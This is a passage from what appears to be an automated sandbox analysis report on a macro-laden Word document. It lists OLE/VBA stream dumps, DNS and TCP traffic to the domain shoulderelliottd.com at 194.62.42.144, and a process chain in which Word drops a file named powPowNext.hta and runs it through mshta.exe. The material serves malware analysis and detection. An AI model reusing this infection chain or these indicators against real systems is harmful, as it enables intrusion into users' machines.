      Data Raw:01 16 03 00 00 f0 00 00 00 9a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff a1 02 00 00 a1 03 00 00 00 00 00 00 01 00 00 00 4c 2f 2e e2 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      VBA Code

      Streams

      Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 394
      General
      Stream Path:PROJECT
      File Type:ASCII text, with CRLF line terminators
      Stream Size:394
      Entropy:5.28471344287
      Base64 Encoded:True
      Data ASCII:I D = " { A A 3 4 7 5 E 1 - 1 0 B 7 - 4 6 7 2 - 9 5 8 4 - C 9 3 4 8 5 4 D 1 D 0 2 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = m a i n . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " B 1 B 3 2 C 5 4 3 0 5 4 3 0 5 4 3 0 5 4 3 0 " . . D P B = " 6 2 6 0 F F 4 C B 1 4 D B 1 4 D B 1 " . . G C = " 1 3 1 1 8 E 1 F 3 E 2 0 3 E 2 0 C 1 " . . . . [ H o s t E x t e n d e
      Data Raw:49 44 3d 22 7b 41 41 33 34 37 35 45 31 2d 31 30 42 37 2d 34 36 37 32 2d 39 35 38 34 2d 43 39 33 34 38 35 34 44 31 44 30 32 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 6d 61 69 6e 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56
      Stream Path: PROJECTwm, File Type: data, Stream Size: 56
      General
      Stream Path:PROJECTwm
      File Type:data
      Stream Size:56
      Entropy:3.05665670746
      Base64 Encoded:False
      Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . m a i n . m . a . i . n . . . . .
      Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 6d 61 69 6e 00 6d 00 61 00 69 00 6e 00 00 00 00 00
      Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 3229
      General
      Stream Path:VBA/_VBA_PROJECT
      File Type:data
      Stream Size:3229
      Entropy:4.37746268314
      Base64 Encoded:False
      Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c .
      Data Raw:cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
      Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 1874
      General
      Stream Path:VBA/__SRP_0
      File Type:data
      Stream Size:1874
      Entropy:3.57587931409
      Base64 Encoded:False
      Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ V . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . O . ) . 2 . . X + . . .
      Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00
      Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 209
      General
      Stream Path:VBA/__SRP_1
      File Type:data
      Stream Size:209
      Entropy:2.03643843122
      Base64 Encoded:False
      Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . d o w G i r l L o a d \\ . . . . . . . . . . . . . . .
      Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff 06 00 00 00 00 00
      Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 835
      General
      Stream Path:VBA/__SRP_2
      File Type:data
      Stream Size:835
      Entropy:2.00768639044
      Base64 Encoded:False
      Data ASCII:r U . . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` i . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:72 55 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 03 00 03 00 00 00 00 00 01 00 01 00 00 00 01 00 d1 08 00 00 00 00 00 00 00 00 00 00 01 09 00 00 00 00 00 00 00 00 00 00 31 09
      Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 290
      General
      Stream Path:VBA/__SRP_3
      File Type:data
      Stream Size:290
      Entropy:2.16919875755
      Base64 Encoded:False
      Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . @ . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O . P . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O . O . 8 . . . . . . . . . . . . . . . . ` . . . . 8 . . . . . . . . . . . . . . .
      Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 40 00 e1 01 00 00 00 00 00 00 00 00 02 00 00 00 04 60 04 01 e1 0d ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
      Stream Path: VBA/dir, File Type: data, Stream Size: 711
      General
      Stream Path:VBA/dir
      File Type:data
      Stream Size:711
      Entropy:6.38404585368
      Base64 Encoded:True
      Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . @ Y . c . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * , \\ C . . . . ? . m . .
      Data Raw:01 c3 b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 40 59 83 63 0e 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

      Network Behavior

      Network Port Distribution

      TCP Packets

      TimestampSource PortDest PortSource IPDest IP
      Nov 12, 2021 21:00:03.762828112 CET4916780192.168.2.22194.62.42.144
      Nov 12, 2021 21:00:06.775511026 CET4916780192.168.2.22194.62.42.144
      Nov 12, 2021 21:00:12.813100100 CET4916780192.168.2.22194.62.42.144

      UDP Packets

      TimestampSource PortDest PortSource IPDest IP
      Nov 12, 2021 21:00:03.428747892 CET5216753192.168.2.228.8.8.8
      Nov 12, 2021 21:00:03.665810108 CET53521678.8.8.8192.168.2.22

      DNS Queries

      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
      Nov 12, 2021 21:00:03.428747892 CET192.168.2.228.8.8.80xa5feStandard query (0)shoulderelliottd.comA (IP address)IN (0x0001)

      DNS Answers

      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
      Nov 12, 2021 21:00:03.665810108 CET8.8.8.8192.168.2.220xa5feNo error (0)shoulderelliottd.com194.62.42.144A (IP address)IN (0x0001)

      Code Manipulations

      Statistics

      Behavior

      Click to jump to process

      System Behavior

      General

      Start time:20:59:14
      Start date:12/11/2021
      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      Wow64 process (32bit):false
      Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
      Imagebase:0x13f0c0000
      File size:1423704 bytes
      MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:20:59:18
      Start date:12/11/2021
      Path:C:\Windows\explorer.exe
      Wow64 process (32bit):false
      Commandline:c:\windows\explorer c:\users\public\powPowNext.hta
      Imagebase:0xffa10000
      File size:3229696 bytes
      MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:20:59:18
      Start date:12/11/2021
      Path:C:\Windows\explorer.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
      Imagebase:0xffa10000
      File size:3229696 bytes
      MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:20:59:19
      Start date:12/11/2021
      Path:C:\Windows\SysWOW64\mshta.exe
      Wow64 process (32bit):true
      Commandline:"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\powPowNext.hta"
      Imagebase:0xc30000
      File size:13312 bytes
      MD5 hash:ABDFC692D9FE43E2BA8FE6CB5A8CB95A
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Disassembly

      Code Analysis

      Reset < >